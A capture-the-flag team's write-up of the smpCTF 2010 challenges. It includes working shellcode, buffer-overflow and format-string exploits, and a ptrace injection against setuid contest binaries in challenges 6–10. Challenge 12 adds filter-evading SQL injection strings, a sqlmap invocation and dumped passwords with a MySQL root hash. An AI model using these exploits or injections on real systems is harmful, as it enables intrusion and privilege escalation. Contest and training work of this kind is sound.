Normal Challenges
Challenge 1
Set S = 1
Set P = 1
Set previous answer = 1
answer = S * P + previous answer + R
R = 39
After this => S + 1 and P + 1 ('answer' becomes 'previous answer') + 39
then repeat this till you have S = 11065.
The final key will be the value of 'answer' when S = 11065.
Example:
So if R = 15..
17 = 1 * 1 + 1 + 15
36 = 2 * 2 + 17 + 15
60 = 3 * 3 + 36 + 15
Submit the correct answer and you will receive a flag. Have fun ;D
So a simple programming task eh? Yeah it was, but it turned out the challenge was badly broken for about the first 4 hours of the ctf!1!1 :/ Anyway, some teams got it correct by either figuring out what is broken or by accident… We waited until it was fixed and used the following python snippet to calculate the value:
import sys
s = 1
p = 1
pa = 1
r = int(sys.argv[1])
while s<=int(sys.argv[2]):
a = s*s+pa+r
print "%d = %d * %d + %d + %d" %(a, s, p, pa, r)
s+=1
p+=1
pa = a
print a
the placeholders for r and the value of s where necessary as the html source of this challenge suggested:
<!--VGhlIHZhbHVlcyBvZiBTIGFuZCBSIGNoYW5nZSBldmVyeSA1IG1pbnV0ZXMgb3Igc28gaGVoZSA7--> and: echo -n "VGhlIHZhbHVlcyBvZiBTIGFuZCBSIGNoYW5nZSBldmVyeSA1IG1pbnV0ZXMgb3Igc28gaGVoZSA7"|base64 -d The values of S and R change every 5 minutes or so hehe
Challenge 2
ssh -l luser gordo.smpctf.com -p 2282 Password: smpctf Help find waldo..
Logging into this server we found ourselves inside a running vim editor as this had been set as the login shell for luser.
:set shell=/bin/sh :sh
quickly got us out of there and looking around on the host we found lots of crap, stuff by other teams, *lots* of red herrings (e.g. a tarball that suggested that it was a full dump of the challenges + some solutions and even including some flags). In the end it was just a file located at /usr/lib/.flag/.smpFLAG containing our flag.
Challenge 3
So this challenge welcomed us with:
Generate a file which has a SHA-1 hash of: 008ce55c7d1b602dc4c4c3ad52a5d064e6d1ef12 Hint: DRM-0, Linux-1 _DO NOT BRUTE FORCE_ it's not required... Hidden hint (HTML comment): t3=(*((unsigned int *)(key+2)))^(*((unsigned int *)(sec+0x56)));
We quickly found out that the hidden code snippet was a part of the decss descramble function which you can find e.g. in http://decss.zoy.org/decss.c.
This also matched the interpretation of DRM-0, Linux-1 which can be understood as Linux won over DRM.
For hours we looked into how we could use the decss code to generate a hash, hashes of decss implementations and tried submitting various code snippets from this file. In the end the solution was easy, but also rather dumb.
The input text generating the requested sha1sum was indeed just a part of the code:
void CSSdescramble(unsigned char *sec,unsigned char *key) {
unsigned int t1,t2,t3,t4,t5,t6;
unsigned char *end=sec+0x800;
t1=key[0]^sec[0x54]|0x100;
t2=key[1]^sec[0x55];
t3=(*((unsigned int *)(key+2)))^(*((unsigned int *)(sec+0x56)));
t4=t3&7;
t3=t3*2+8-t4;
sec+=0x80;
t5=0;
while(sec!=end) {
t4=CSSt2[t2]^CSSt3[t1];
t2=t1>>1;
t1=((t1&1)<<8)^t4;
t4=CSSt5[t4];
t6=(((((((t3>>3)^t3)>>1)^t3)>>8)^t3)>>5)&0xff;
t3=(t3<<8)|t6;
t6=CSSt4[t6];
t5+=t6+t4;
*sec++=CSSt1[*sec]^(t5&0xff);
t5>>=8;
}
}
We had even tried that code block multiple times before but it seemed we failed with the formatting.
Challenge 4
This challenge provided us with a web form again:
Welcome Unknown! <b>Error</b>: administrator access denied<!---Challenge Key: de270765 ---> <form action="http://66.225.157.70:8009/level1/index.php" method="get" name="reg"> <input name="name" type="text" size="25" maxlength="60" /> <input name="submit" type="submit" value="Authenticate" /> <input name="" type="reset" /> </form>
So it wasn’t a stroke of genius to try using administrator as the user value in this challenge. Doing this gets you to a page that says that "administrator" is not allowed in the input. Playing a bit around with the input it was clear that this is no sql injection attack and also injecting a null byte doesn’t work to bypass this. The final clue was to try a POST request instead a GET request (this was really the last option we though of at this point) and it worked and provided us with a huge base64 text that when dumped to a file turned out to be a jpg showing our flag text.
Challenge 5
So we were given a file called forensic1-image and our goal was to find a flag :) Excuse our laziness to comment on each packer format…
$ file forensic1-image forensic1-image: rzip compressed data - version 2.1 (15185973 bytes) $ cp forensic1-image 1.rz && sudo apt-get install rzip && rzip -d 1.rz ... $ file 1 1: LHarc 1.x/ARX archive data [lh0] $ cp 1 2.lha && sudo apt-get install lha && lha x 2.lha ... This got us FS.tar $ file FS.tar FS.tar: POSIX tar archive (GNU) $ tar tfv FS.tar -rw-r--r-- root/root 15184071 2010-06-30 03:52 FS $ tar xvf FS.tar FS $ file FS FS: bzip2 compressed data, block size = 900k $ cp FS 3.bz2 && bunzip2 3.bz2 $ file 3 3: gzip compressed data, was "FS", from Unix, last modified: Wed Jun 30 03:42:18 2010, max compression $ cp 3 4.gz $ gunzip 4.gz $ file 4 4: Linux rev 1.0 ext2 filesystem data, UUID=c8a4643d-d89b-43db-bae8-6192db41dcc1 (large files) $ mkdir foo $ sudo mount -o loop 4 foo $ ls -laR foo foo: total 15400 drwxr-xr-x 3 root root 4096 30. Jun 03:50 ./ drwxr-x--- 3 nion nion 4096 15. Jul 21:16 ../ -rw-r--r-- 1 root root 15723366 30. Jun 03:50 forensic_image drwx------ 2 root root 16384 30. Jun 03:42 lost+found/ ls: cannot open directory foo/lost+found: Permission denied $ file foo/forensic_image foo/forensic_image: data Hmm so let's check how it looks. $ file foo/forensic_image foo/forensic_image: data $ hexdump -C foo/forensic_image|head -20 00000000 00 e9 55 43 4c ff 01 1a 00 00 00 01 2d 07 00 04 |..UCL.......-...| 00000010 00 00 00 04 00 00 00 04 00 00 6a 6f 65 2f 00 00 |..........joe/..| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 30 |..............00| 00000080 30 30 37 35 35 00 30 30 30 31 37 35 33 00 30 30 |00755.0001753.00| 00000090 30 31 37 35 35 00 30 30 30 30 30 30 30 30 30 30 |01755.0000000000| 000000a0 30 00 31 31 34 31 32 35 31 35 32 30 30 00 30 30 |0.11412515200.00| 000000b0 37 37 34 36 00 20 35 00 00 00 00 00 00 00 00 00 |7746. 5.........| 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000110 00 00 00 00 00 00 00 00 00 00 00 75 73 74 61 72 |...........ustar| 00000120 20 20 00 6a 6f 65 00 00 00 00 00 00 00 00 00 00 | .joe..........| 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000140 00 00 00 6a 6f 65 00 00 00 00 00 00 00 00 00 00 |...joe..........| 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000210 00 00 00 00 00 00 00 00 00 00 6a 6f 65 2f 2e 64 |..........joe/.d| 00000220 62 75 73 2f 00 00 00 00 00 00 00 00 00 00 00 00 |bus/............| 00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
We had no idea what UCL is but since it’s at the beginning it was probably some magic value for a specific file type, even if the file command didn’t know it. Digging through Debians archive we found libucl-dev and libucl1 which included an example source file to unpack UCL files.
$ cp /usr/share/doc/libucl-dev/examples/Makefile /usr/share/doc/libucl-dev/examples/uclpack.c.gz /usr/share/doc/libucl-dev/examples/portab.h . $ make uclpack gzip -d uclpack.c.gz gcc -O2 -c -o uclpack.o uclpack.c gcc -lucl uclpack.o -o uclpack rm uclpack.c $ ./uclpack UCL data compression library (v1.03, Jul 20 2004). Copyright (C) 1996-2004 Markus Franz Xaver Johannes Oberhumer http://www.oberhumer.com/opensource/ucl/ usage: uclpack [options] input-file output-file (compress) uclpack -d compressed-file output-file (decompress) uclpack -t compressed-file... (test) uclpack -t -D1000 compressed-file... (test decompression speed) compression options: -1...-9, --10 set compression level [default is `-7'] --nrv2b use NRV2B compression method --nrv2d use NRV2D compression method [default] --nrv2e use NRV2E compression method other options: -F do not store or verify a checksum (faster) -Bxxxx set block-size for compression [default 262144] -Dxxxx number of iterations for decompression benchmark $ ./uclpack -d forensic_image foo UCL data compression library (v1.03, Jul 20 2004). Copyright (C) 1996-2004 Markus Franz Xaver Johannes Oberhumer http://www.oberhumer.com/opensource/ucl/ uclpack: block-size is 262144 bytes uclpack: decompressed 15723366 into 31989760 bytes $ file foo foo: POSIX tar archive (GNU) $ tar tvf foo|wc -l 659
Unpacking this resulted in a home directory of a user called joe with again lots of files and lots of red herrings in it. Looking around for interesting stuff we stumbled upon a pcap file: network_sniff.pcap. Opening this file in wireshark and sorting by the info field we found a http request to /flagg.jpg. Looking into this stream we then also found the flag inside the requested image data. "This is your Flag: Seeing is not always believing!". We didn’t check but it is probably a printable part in an exif structure (comment).
Challenge 6
So now finally something to pwn. For this challenge we were instructed to login to an smpCTF host again and exploit a binary called challenge6.
challenge6_bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
After firing up IDA pro to disassemble the binary it was clear that the underlying C code of this binary has been something like:
int vuln2(char *src){
char buf[100];
strcpy(buf, src);
return 0;
}
int vuln1(char *src){
return vuln2(src);
}
int main(int argc, char **argv){
if(argc > 1){
puts("found argument");
exit(0);
}
vuln1(argv[1]);
return 0;
}
Our goal was to exploit the simple buffer overflow in vuln2 but our problem was the argc check in main. argv[1] will be passed as the source buffer but the program was checking that there is only argv[0]. The solution was simple, write a program that has no argument by setting argv to NULL and place your shellcode somewhere else, e.g. in the environment. We were hitting the saved ret starting after 104 bytes, 100 buf + 4 ebp.
Exploit:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void){
/* make sure our buffers are on the stack and not placed somewhere else
or we will run into problems with execve
*/
unsigned char pld[]= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB";
char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
unsigned char *envp[] = {pld, shellcode, NULL};
char *argv[] = { NULL };
int i;
unsigned char *tmp = NULL;
u_long addr = envp[1] + 0x558; /* estimated offset hitting somewhere in the nopsled... */
printf("[+] shellcode: %p, envp: %p\n", addr, envp);
tmp = strchr(envp[0], 'B');
printf("[+] ret hit at: %p\n", tmp);
for(i=0; i < sizeof(u_long); i++){
tmp[i] = ((u_long) addr >> (i*8) & 255);
}
printf("[+] executing program\n");
printf("%d\n", execve("/usr/smp/challenge6/challenge6_bin", argv, envp));
return 0;
}
Challenge 7
And again we found a nice small linux 32 bit binary to exploit. On startup the binary first registers a signal handler for SIGILL:
8048529: 68 c4 84 04 08 push 0x80484c4 804852e: 6a 04 push 0x4 8048530: e8 3f fe ff ff call 8048374 <signal@plt>
0x80484c4 was a function called vuln which we will look later at in this writeup. After this the function checks the command line arguments (argc)
0804850b <main>: 804850b: 8d 4c 24 04 lea ecx,[esp+0x4] ... 804851c: 89 4d e8 mov DWORD PTR [ebp-0x18],ecx ... 8048538: 8b 45 e8 mov eax,DWORD PTR [ebp-0x18] 804853b: 83 38 01 cmp DWORD PTR [eax],0x1 804853e: 7f 1a jg 804855a <main+0x4f>
If argc > 1 the code skips an error exit path (puts("Give an argument!!") + exit()).
After that the binary copies 0x3ff bytes from argv[1] into a global array (size 0x400) located in the bss segment and raises a SIGILL before exiting.
8048568: 68 ff 03 00 00 push 0x3ff 804856d: 50 push eax 804856e: 68 c0 97 04 08 push 0x80497c0 8048573: e8 1c fe ff ff call 8048394 <strncpy@plt> 8048585: 83 c4 10 add esp,0x10 8048588: 83 ec 0c sub esp,0xc 804858b: 6a 00 push 0x0 804858d: e8 62 fe ff ff call 80483f4 <exit@plt>
This causes our signal handler vuln to be called so let’s have a look at vuln.
080484c4 <vuln>: 80484c4: 55 push ebp 80484c5: 89 e5 mov ebp,esp 80484c7: 81 ec 88 00 00 00 sub esp,0x88 80484cd: 83 ec 0c sub esp,0xc 80484d0: 68 60 86 04 08 push 0x8048660 80484d5: e8 fa fe ff ff call 80483d4 <puts@plt> 80484da: 83 c4 10 add esp,0x10 80484dd: 83 ec 04 sub esp,0x4 80484e0: 68 80 00 00 00 push 0x80 80484e5: 6a 00 push 0x0 80484e7: 8d 45 80 lea eax,[ebp-0x80] 80484ea: 50 push eax 80484eb: e8 b4 fe ff ff call 80483a4 <memset@plt> 80484f0: 83 c4 10 add esp,0x10 80484f3: 83 ec 04 sub esp,0x4 80484f6: 68 c0 97 04 08 push 0x80497c0 80484fb: 6a 7f push 0x7f 80484fd: 8d 45 80 lea eax,[ebp-0x80] 8048500: 50 push eax 8048501: e8 de fe ff ff call 80483e4 <snprintf@plt> 8048506: 83 c4 10 add esp,0x10 8048509: c9 leave 804850a: c3 ret
First the function prints out the string "FAIL!" (located at 0x8048660) before filling a local stack buffer with 0x80 null bytes. Then snprintf is called with a destination parameter that is our just nulled stack buffer, a size of 0x7f and using our previously filled buffer at 0x80497c0 as src. At this point it’s important to notice that an additional argument pointing to our format string is missing. So what we have here is a classic format string vulnerability.
Instead of trying to hit the necessary pointer values in the source buffer, we put them at the start of the actual format string - thus they were already copied to the destination buffer when the %n conversions fired and could be used at their new location (which was in the local stack frame and therefore oh so convenient).
The return address of vuln was located at 0xbffff01c and 0xbffff0e4 points into our nopsled.
Exploit:
./challenge7_bin "$(echo -ne "\x1c\xeb\xff\xbf____\x1d\xeb\xff\xbf____\x1e\xeb\xff\xbf____\x1f\xeb\xff\xbf%200u%4\$n%12u%6\$n%15u%8\$n%192u%10\$n")" \ "$(echo -ne "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")"
Challenge 8
Since I didn’t take any notes (like stack offsets) except for the actual command to run the exploit, I’ll summarize the way this challenge was solved here instead of dumping the usual gdb histories and stack dumps.
This challenge was acting like a wrapper for ls -al, using strncpy and strncat to build the argument for system() in a subroutine. After copying "ls -al " into the 0x104 byte argument buffer, another 0x103 bytes plus null byte could be appended from argv[1] using strncat. This effectively overwrote RET and EBP on the stack, however with the catch that the last byte written would always be a null byte. This prevented overwriting RET to directly jump to our shell code, however it gave us control over EBP after returning from the subroutine. After returning to main, ESP was eventually overwritten with an address loaded from EBP-0x4, right before calling RET from main. Accordingly, by making that address point to an address referencing our shell code, the final RET set EIP to the start of our code - which incidentally spawned /bin/sh :P The last catch was that bash reset the effective user id, which we could prevent by using /bin/sh -p in our shell code.
Exploit:
./challenge8_bin $(perl -e 'print "\x90"x177 . "\x08\xf3\xff\xbf\x90\x90\x90\x90\x08\xf3\xff\xbf" ."\x90\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80" ."\x90" x 30;')
Challenge 9
This challenge presented a ELF 32-bit binary to us which basically allocates a few heap chunks, marks the first 1024 bytes of a chunk as executable (which would allow us to execute shellcode placed in the buffer) and is vulnerable to a heap-based buffer overflow.
c7 04 24 00 04 00 00 mov DWORD PTR [esp],0x400 e8 78 fc ff ff call 564 <malloc@plt> 8b 54 24 10 mov edx,DWORD PTR [esp+0x10] c7 44 24 08 07 00 00 mov DWORD PTR [esp+0x8],0x7 00 c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400 00 89 14 24 mov DWORD PTR [esp],edx e8 3c fc ff ff call 544 <mprotect@plt> 8b 83 f4 ff ff ff mov eax,DWORD PTR [ebx-0xc] 8b 6c 24 10 mov ebp,DWORD PTR [esp+0x10] 8b 08 mov ecx,DWORD PTR [eax] 89 2c 24 mov DWORD PTR [esp],ebp c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1 00 c7 44 24 04 00 00 10 mov DWORD PTR [esp+0x4],0x100000 00 89 4c 24 0c mov DWORD PTR [esp+0xc],ecx e8 44 fc ff ff call 574 <fread@plt> <- buffer overflow 8b 7c 24 10 mov edi,DWORD PTR [esp+0x10] 89 3c 24 mov DWORD PTR [esp],edi e8 f8 fb ff ff call 534 <free@plt>
At the beginning of the code there was a little anti-debugging trick using ptrace in place:
c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0 00 c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0 00 c7 44 24 04 00 00 00 mov DWORD PTR [esp+0x4],0x0 00 c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0 89 44 24 10 mov DWORD PTR [esp+0x10],eax e8 13 fe ff ff call 514 <ptrace@plt> 85 c0 test eax,eax 0f 88 6a 02 00 00 js 973 <main+0x2c3>
So if the program was already running under e.g. gdb it will go right into an
exit instead of executing the rest of the program. We first thought about
patching out this instruction for debbugging until we noticed that this
anti-debugging trick also gave us a nice way to bypass exploiting the intended
heap-overflow and thus allowed us to save a lot of time. Tracing setuid binaries by
marking the child as traced before the execve() [think strace(1)] doesn’t work for obvious
security reasons, but if the setuid binary voluntarily issues PTRACE_TRACEME itself, it's
begging to expose its secrets...
So in order to exploit this binary we just needed to respond to the TRACEME (i.e.
attach to the program), stop at the point before the fread() call, place our
shellcode in the first 1024 bytes heap-space, adjust EIP to point directly
at the start of that buffer and detach the trace.
Here we go:
#include <sys/ptrace.h>
#include <sys/fcntl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
void traphdl(int s) {
printf("TRAP caught.\n");
}
int main(int an, char **ac, char **environ) {
char shellcode[] = "\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\x31\xc3\x80\xc2\x99\xc2\xb0\x05\x68\x43\x54\x46\x00\x68\x2e\x73\x6d\x70\xc2\x89\xc3\xa3\x31\xc3\x89\xc3\x8d\xc2\x80\xc2\x89\xc3\x86\xc2\x89\xc3\x90\xc2\xb0\x03\xc2\x89\xc3\xb3\xc2\x89\xc3\xa1\xc2\xb2\x60\xc3\x8d\xc2\x80\x31\xc3\x80\xc2\xb0\x04\x31\xc3\x9b\xc3\x8d\xc2\x80";
int f;
signal(SIGTRAP, traphdl);
f = fork();
if (f == 0) {
int g = open("/tmp/.hesso/flagX", O_TRUNC|O_RDWR, 0666);
dup2(g, 1);
dup2(g, 2);
char *X[2] = { "/usr/smp/challenge9/challenge9", NULL };
execve(X[0], X, environ);
return 255;
} else if (f > 0) {
int W = 0, S;
sleep(2);
kill(f, SIGCHLD);
while (W == 0 || errno != ECHILD) {
errno = 0;
W = waitpid(f, &S, 0);
if (W == f && WIFSTOPPED(S) && WSTOPSIG(S) == SIGCHLD) {
struct user_regs_struct U;
unsigned long p, p2, pE;
memset(&U, 0, sizeof(U));
ptrace(PTRACE_GETREGS, f, 0, &U);
fprintf(stderr, "EIP/EBP/ESP: %p / %p / %p\n", U.eip, U.ebp, U.esp);
for (p = U.ebp; p; ) {
p2 = ptrace(PTRACE_PEEKDATA, f, p, 0);
pE = ptrace(PTRACE_PEEKDATA, f, p+4, 0);
fprintf(stderr, "EBP at %p has %p, r-eip %p\n", p, p2, pE);
p = p2;
if ((pE & 0xfff) == 0x930) {
break;
}
}
// RWX memory at (p)
for (p2 = 0; p2 < sizeof(shellcode); p2 += 4) {
ptrace(PTRACE_POKEDATA, f, p + p2, *(long *)(shellcode + p2));
}
for (p2 = 0; p2 < 40; p2 += 4) {
fprintf(stderr, "Stack frame at %p: %8.8x\n", p+p2, ptrace(PTRACE_PEEKDATA, f, p+p2, 0));
}
U.eip = p+2;
U.esp = U.eip + 150;
ptrace(PTRACE_SETREGS, f, 0, &U);
ptrace(PTRACE_GETREGS, f, 0, &U);
fprintf(stderr, "EIP before/after: %p\n", U.eip);
while (1) {
ptrace(PTRACE_SINGLESTEP, f, 0, 0);
(void)waitpid(f, &S, 0);
ptrace(PTRACE_GETREGS, f, 0, &U);
printf("Now at %p\n", U.eip);
usleep(100000);
}
ptrace(PTRACE_DETACH, f, 0, 0);
} else if (W == f) {
ptrace(PTRACE_DETACH, f, 0, 0);
}
}
}
return 0;
}
Challenge 10
This challenge again was a small 32 bit linux binary that took a data command line argument in argv[1] and was passing this parameter to a function named vuln. The first thing to notice in this function is a check for the environment variable SMP being set. If it’s not the binary instantly returns:
8048431: c7 04 24 b0 85 04 08 mov DWORD PTR [esp],0x80485b0 8048438: e8 d3 fe ff ff call 8048310 <getenv@plt> 804843d: 85 c0 test eax,eax 804843f: 74 35 je 8048476 <vuln+0x72> .... 8048476: 81 c4 1c 04 00 00 add esp,0x41c 804847c: c3 ret
After passing this step the code then copies byte-wise from argv[1] to a local stack buffer (1024 bytes):
eb 25 jmp 8048468 <vuln+0x64> 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418] eax = [esp+0x418] 8b 94 24 20 04 00 00 mov edx,DWORD PTR [esp+0x420] edx = [esp+0x420] 0f b6 12 movzx edx,BYTE PTR [edx] edx = *[esp+0x420] 88 54 04 18 mov BYTE PTR [esp+eax*1+0x18],dl[esp + [esp+0x418]+0x18] = *[esp+0x420] 83 84 24 18 04 00 00 add DWORD PTR [esp+0x418],0x1 [esp+0x418]++ 01 83 84 24 20 04 00 00 add DWORD PTR [esp+0x420],0x1 [esp+0x420]++ 01 8b 84 24 20 04 00 00 mov eax,DWORD PTR [esp+0x420] 0f b6 00 movzx eax,BYTE PTR [eax] 84 c0 test al,al 75 cd jne 8048443 <vuln+0x3f>
This pretty much translates to:
char vuln(char *argv1){
char *r = getenv("SMP");
int c = 0;
char buf[1024];
if(r){
while(1){
r = argv;
if(*r == NULL) break;
buf[c++] = *r;
argv1++;
}
}
return r;
}
This is a very simple buffer overflow. The only thing to take into account when exploiting this is that the counter is overwritten as well as it resides past the beginning of our buffer. So we need to overwrite this with an appropriate value to overwrite the saved return address. The counter value is hit exactly after 1024 bytes. So by overwriting the low byte of the counter with the value 0x3 the counter will be 1024 in the next run of the loop (post-increment). As this function doesn’t push ebp onto the stack the next iteration at buf[1024] already allows us to overwrite ret.
There was no stack randomization in place thus we determined the address of our buffer in gdb and bruteforced the last byte of the address in the shell (the address is usually a few bytes off compared to the gdb session).
Exploit:
for i in $(seq 1 255);
do
x="$(printf "%x" $i)";
/usr/smp/challenge10/challenge10 "$(echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x03\x$x\xd3\xff\xbf")"
done
Challenge 11
0-day exploit in phplist. We didn’t solve this challenge, which was partially due to the service becoming unusable while the only person being able to reset its password was unreachable. We did stumble over a few places in the sources that looked to be potentially exploitable, however at the time we couldn’t bring up the motivation to set up our own copy to verify this or to delve deeper into php code. Instead, we focused on other challenges.
Challenge 12
After connecting to the web page, we spotted an html comment that gave a clue of what was happening (<!---Error: Unable to query user information: Invalid id--→). So, with this tip, we could infer that the webpage expects a parameter called “id”, so we gave it a try: http://66.225.157.70:8009/level2/?id=1
With the previous request, it gave a valid message with a username. After that, we started to try different SQL injection vectors, but we were unsuccessful. The good thing was that the different error messages that were shown helped us to focus on the correct direction. Finally, we made an interesting observation: the server filtered all whitespace characters ‘ ‘, so we had to make an injection without using spaces (0x20). With a quick look at an amazing post about evading tricky MySQL filters (http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/) we found that we could use Mysql comments to trick the server.
After some tries, we found a valid injection:
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=1%23/* ⇒ TRUE
http://66.225.157.70:8009/level2/?pass=asdfa&id=id/**/and/**/1=0%23/* ⇒ FALSE
After that, we used the excellent SQL Injection tool sqlmap (thanks Bernardo xD) in order to obtain a full dump of the database. The only problem was that the tool would use spaces in its SQL queries, so we had to find a way to automatically substitute these "undesired" characters. Finally I launched the Burp proxy which has a cool feature called “match and replace”, so what I did was replace all the spaces with the string /**/ (MySQL comment). Lazy, but time-efficient ;p.
alex@localhost> python sqlmap.py -u http://66.225.157.70:8009/level2/?pass=asdfa&id=id -p id --proxy=http://192.168.0.2:8080 --postfix=%23 \ --string=magik --current-db -T users -D level1 –dump
In order to make the previous command work, we had to fool sqlmap on the first 3 queries: The tool tests if the URL is stable (by looking for the string ‘magik’), but it is not returned on the normal response (without injection). So, we changed these queries with Burp in order to return the expected string. Beyond that the injection was flawless. After waiting some minutes we obtained the cookie that allow us to level up:
+------------+----+---------------+-----------------+ | flag | id | name | pass | +------------+----+---------------+-----------------+ | iR0ck | 1 | magik | newPass2 | | HaHa | 2 | redsand | blaISAGHEYhorse | | lolFLAGlol | 3 | cookieMonster | 50c43871 | +------------+----+---------------+-----------------+
The flag lolFLAGlol was the solution.
As an interesting note, I ran sqlmap in order to obtain more info on the MySQL server, and this is what I obtained. Yep, the database user was DBA, and we obtained a nice hash to be cracked in our spared time xD.
current database: 'level1'
banner: '5.0.84'
current user is DBA: 'True'
available databases [3]:
[*] information_schema
[*] level1
[*] mysql
current user: 'root@localhost'
current database: 'level1'
current user is DBA: 'True'
database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'slackware2-web-smp'
database management system users password hashes:
[*] root [1]:
password hash: *E811D7768F080444F8D9ED913EEC8200FAD3C4FE
banner: '5.0.84'
Database: level1
Table: users
[3 entries]
+------------+----+---------------+-----------------+
| flag | id | name | pass |
+------------+----+---------------+-----------------+
| iR0ck | 1 | magik | newPass2 |
| HaHa | 2 | redsand | blaISAGHEYhorse |
| lolFLAGlol | 3 | cookieMonster | 50c43871 |
+------------+----+---------------+-----------------+
Challenge 13
To solve this challenge, you had to figure out what this picture was showing:
Additional information provided was:
Date Predict. HST-Inferred Observations Best Estimate July (UTC) (UTC) (UTC)
